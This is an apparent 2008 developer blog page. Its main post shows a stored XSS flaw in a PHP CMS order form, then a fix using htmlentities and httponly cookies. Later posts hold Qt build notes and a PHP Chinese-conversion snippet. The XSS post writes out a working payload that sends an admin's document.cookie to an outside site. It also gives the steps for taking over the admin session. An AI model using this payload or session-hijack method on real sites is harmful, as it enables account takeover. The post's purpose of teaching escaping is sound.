Wednesday, October 15, 2008

XSS Hack into website by unescaped data

I've told my teammates 1000 times that everything must be escaped, but I still found this terrible PHP code in their projects. This is unprofessional... sigh...

<input id="name" name="name" value="<?php echo htmlspecialchars($row["name"]) ?>" />
<textarea id="address" name="address">
<?php echo $row["address"] /* address is echoed raw, no escaping at all */ ?>
</textarea>

The code above is an order form in the web CMS backend. $row is read from the database and contains the name and address fields, which display the values the frontend user entered. Each order's info can be modified from the CMS backend.

Here is a note on how to get into the CMS backend without a password.

0. Go to the frontend and enter my info.

1. First, in my name field, I enter my site: "http://www.webmoss.net/?".

2. Second, in my address field, I enter "</textarea><script>location.href=document.all.name.value+document.cookie</script>".

3. If some admin logs in to the CMS backend and views my info, his cookie data will be sent to my site directly, including the session id (PHPSESSION). Then I check my www.webmoss.net access log and get the session id and the referer link.

4. Install this cookie editor, https://addons.mozilla.org/en-US/firefox/addon/573, and copy the session id into the cookie editor. Go to the referer link found in the www.webmoss.net access log.

5. Yo, I saw my info in the backend. This is terrible.


To fix this hole, simply use htmlentities like this:
<?=htmlentities($row["des"],ENT_QUOTES,"UTF-8")?>

I don't want a 1001st time.
Not only the textarea must use htmlentities; every piece of data has to go through htmlentities.

Here is the code:
"</body><script>location.href=document.all.name.value+document.cookie</script>"
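As an added example (not the post's code), here is the same order form rendered with every value escaped for the context it lands in, plus a small check that the payload quoted above no longer breaks out of the textarea. $row is a constructed sample, not data read from a database; the e() and form_is_intact() helpers are assumptions for this example. ENT_SUBSTITUTE requires PHP 5.4 or later.

```php
<?php
// Added example, not the post's code. $row below is a constructed sample.

// Escape for HTML body text and double-quoted attribute values.
// ENT_QUOTES also escapes single quotes; ENT_SUBSTITUTE replaces invalid
// UTF-8 with U+FFFD instead of returning an empty string, so a bad byte
// cannot silently blank the field.
function e(string $value): string
{
    return htmlentities($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Render the order form with every stored value passed through e().
function render_order_form(array $row): string
{
    return '<input id="name" name="name" value="' . e($row['name']) . '" />' . "\n"
         . '<textarea id="address" name="address">' . e($row['address']) . '</textarea>' . "\n";
}

// Structural check for this form: exactly one closing </textarea>, which is
// the one we wrote ourselves, and no <script> tag anywhere in the output.
function form_is_intact(string $html): bool
{
    return substr_count($html, '</textarea>') === 1
        && stripos($html, '<script') === false;
}

// Constructed sample row carrying the exact strings from the post.
$row = [
    'name'    => 'http://www.webmoss.net/?',
    'address' => '</textarea><script>location.href=document.all.name.value+document.cookie</script>',
];

$html = render_order_form($row);
echo $html;
echo form_is_intact($html) ? "form intact: payload rendered as inert text\n"
                           : "markup leaked into the page\n";
```

Escape at output time, once per context, rather than trying to sanitise on input. As defence in depth, set session.cookie_httponly=1 (or pass the httponly flag to session_set_cookie_params) so that a missed escape somewhere else does not hand document.cookie to injected script.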

God Bless

Tuesday, October 14, 2008

C++'s mutable and conceptual constness

Nice OO example; I suggest everyone read this, even if you're not a C++ programmer.

http://www.highprogrammer.com/alan/rants/mutable.html

Saturday, October 4, 2008

Qt 4.4.3 Windows Compiling Notes

Key feature spec:
  • Phonon supported
  • OpenSSL supported
SDK and tools downloads:
OpenSSL fix note:
Move the typedef from the ossl_typ.h file to the ocsp.h file, where struct ocsp_response_st is defined.

Env.:
@echo off
rem Build environment for Qt 4.4.3 with Visual Studio 2008
Set QMAKESPEC=win32-msvc2008
Set QTDIR=C:\qt\4.4.3
rem Put the Qt tools first on PATH
Set PATH=C:\qt\4.4.3\bin;%PATH%
rem Paths contain spaces, so they must be quoted for Call
Call "C:\Program Files\Microsoft DirectX SDK (August 2008)\Utilities\Bin\dx_setenv.cmd"
Call "C:\Program Files\Microsoft Visual Studio 9.0\VC\vcvarsall.bat"
rem No spaces around = : cmd would otherwise include them in the name and value
Set OPENSSL_DIR=c:\openssl

Sunday, October 21, 2007

Traditional/Simplified conversion: Convert Chinese Traditional / Simplified using PHP

PHP; the mbstring extension is required.
Everything is in UTF-8 encoding.

// mbstring is required

str_chinese_trad("标准字") == "標準字"
str_chinese_simp("標準字") == "标准字"

download here
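As an added example (not the downloadable code from this post), here is a minimal converter built the way such functions usually are: a character map applied with strtr(). The three-entry map is a constructed sample; a real converter needs a full Simplified/Traditional table, and some characters map one-to-many, which a plain table cannot resolve. mbstring is used here only to reject input that is not valid UTF-8.

```php
<?php
// Added example, not the post's own code. SIMP_TO_TRAD is a constructed
// three-entry sample map, not a complete conversion table.

if (!extension_loaded('mbstring')) {
    fwrite(STDERR, "mbstring extension is required\n");
    exit(1);
}

// Simplified => Traditional, constructed sample only.
const SIMP_TO_TRAD = [
    '标' => '標',
    '准' => '準',
    '体' => '體',
];

function assert_utf8(string $s): void
{
    // Refuse invalid byte sequences rather than producing mixed garbage.
    if (!mb_check_encoding($s, 'UTF-8')) {
        throw new InvalidArgumentException('input must be valid UTF-8');
    }
}

function str_chinese_trad(string $s): string
{
    assert_utf8($s);
    // strtr() with an array replaces whole keys (longest first), so each
    // multi-byte UTF-8 character is matched as a unit and never split.
    return strtr($s, SIMP_TO_TRAD);
}

function str_chinese_simp(string $s): string
{
    assert_utf8($s);
    return strtr($s, array_flip(SIMP_TO_TRAD));
}

echo str_chinese_trad("标准字"), "\n";   // 字 is unchanged: same glyph in both scripts
echo str_chinese_simp("標準字"), "\n";
```

Do not use the two-string form of strtr() or str_replace() with single bytes for this: the characters are three bytes each in UTF-8 and must be replaced as whole strings.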

Monday, April 23, 2007